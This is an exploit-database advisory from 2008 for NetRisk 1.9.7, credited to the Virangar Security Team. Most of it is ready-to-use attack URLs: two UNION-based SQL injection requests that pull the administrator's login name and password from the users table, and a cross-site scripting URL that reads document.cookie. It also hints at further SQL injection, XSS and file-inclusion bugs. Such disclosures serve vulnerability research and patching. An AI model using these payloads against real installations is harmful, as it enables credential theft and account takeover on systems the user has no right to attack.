NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection



EKU-ID: 12804 CVE: OSVDB-40227;CVE-2008-0186;OSVDB-39982;CVE-2008-0185 OSVDB-ID:
Author: Virangar Security Published: 2008-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


   ####################################################################
   #                                                                  #
   #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #
   #                        (sql injection/xss)                       #
   ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.cookie)</script>

########################
NetRisk contains of  other sql injecton/xss/LFI  bugs in other pages ;)

# milw0rm.com [2008-01-06]